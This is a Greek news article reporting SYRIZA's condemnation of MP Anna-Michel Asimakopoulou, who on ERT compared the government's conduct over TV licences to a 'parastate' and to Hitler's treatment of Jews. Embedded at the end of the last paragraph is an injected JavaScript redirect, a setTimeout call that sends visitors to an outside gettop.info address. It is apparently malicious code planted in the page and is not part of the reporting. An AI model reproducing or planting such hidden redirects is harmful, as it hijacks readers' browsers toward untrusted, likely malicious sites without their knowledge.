Οργή ΣΥΡΙΖΑ για τις δηλώσεις Ασημακοπούλου – Παρακρατική η συμπεριφορά της κυβέρνησης για τις άδειες (ΒΙΝΤΕΟ)

0
29

 

«Μνημείο χυδαιότητας και ευθεία παρέμβαση στο έργο της Δικαιοσύνης» οι δηλώσεις της Άννας-Μισέλ Ασημακοπούλου αναφέρεται σε ανακοίνωση του ΣΥΡΙΖΑ που σχολιάζει τα όσα είπε η βουλευτής της ΝΔ στην πρωινή εκπομπή της ΕΡΤ.

Αναλυτικά προστίθεται στην ανακοινωση ότι οι δηλώσεις της κυρίας Ασημακοπούλου «απορρέουν από την ανιστόρητη θεωρία των δύο άκρων» και αποτελούν «ευθεία παρέμβαση στο θεσμό της Δικαιοσύνης».

«Στην προσπάθεια της να υπερασπιστεί τους καναλάρχες και το καθεστώς ασυδοσίας τους, στο οποίο το κόμμα της έχει συμβάλλει τα μέγιστα, η κ. Ασημακοπούλου έφτασε στο σημείο να κάνει λόγο για πρακτικές της κυβέρνησης που θυμίζουν -παρακράτος- και προσομοιάζουν με την εξόντωση των Εβραίων από τον Χίτλερ!».

«Οι χυδαιότητες αυτές προκάλεσαν την έντονη αντίδραση του κοινοβουλευτικού εκπροσώπου του ΣΥΡΙΖΑ, Χρήστου Μαντά, ενώ οι υπόλοιποι προσκεκλημένοι, δηλαδή ο Γιάννης Μανιάτης από το ΠΑΣΟΚ και ο Παναγιώτης Καρκατσούλης από το Ποτάμι, παρέμειναν άφωνοι» και συμπληρώνεται:

«Οι χυδαιότητες αυτές, που απορρέουν από την ανιστόρητη -θεωρία των δύο άκρων-, αποτελούν ευθεία παρέμβαση στο θεσμό της Δικαιοσύνης εν όψει της επικείμενης απόφασης του Συμβουλίου της Επικρατείας για το νόμο σχετικά με τις τηλεοπτικές άδειες.

Καλούμε τον επικεφαλής της ΝΔ, Κυριάκο Μητσοτάκη, να αποδοκιμάσει τις δηλώσεις της βουλευτή του κόμματός του».

Η κυρία Ασημακοπούλου μιλώντας στην ΕΡΤ έκανε λόγο για «παρακρατική συμπεριφορά» στο θέμα των τηλεοπτικών αδειών.

Η κ. Ασημακοπούλου μίλησε για «αντιθεσμική, αντιδημοκρατική εκτροπή κορυφαίου μεγέθους που θα έπρεπε να ευαισθητοποιήσει όλους τους Έλληνες και να τους θέσει σε μια εγρήγορση, μέχρι και για την προστασία του δημοκρατικού πολιτεύματος«. «Είδαμε πρωτοφανή παρέμβαση και παρακρατική συμπεριφορά της κυβέρνησης σε σχέση με τη Δικαιοσύνη απόφαση του ΣτΕ» πρόσθεσε.

«Όποιος δεν καταλαβαίνει το μέγεθος του κινδύνου που διατρέχουμε από την καθεστωτική αυτή αντίληψη και νοοτροπία της κυβέρνησης, ειλικρινά πρέπει να σκεφτεί και άλλες εποχές…

Στη Γερμανία όταν βγήκε ο Χίτλερ οι Εβραίοι ήταν χωρισμένοι σε δύο κατηγορίες, υπήρχαν αυτοί που τον άκουγαν και έλεγαν ότι αυτά τα οποία λέει θα τα κάνει. Αυτοί λοιπόν τα μάζεψαν και πήγαν στην Αμερική ή κάπου αλλού και σώθηκαν. Αυτοί που έλεγαν δεν πειράζει και έμειναν, αποτεφρώθηκαν» τόνισε η βουλευτής προκαλώντας την αντίδραση του κοινοβουλευτικού εκπροσώπου του ΣΥΡΙΖΑ, Χρήστου Μαντά που της απάντησε: «Είναι άθλια και χυδαία αυτά που λέτε». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here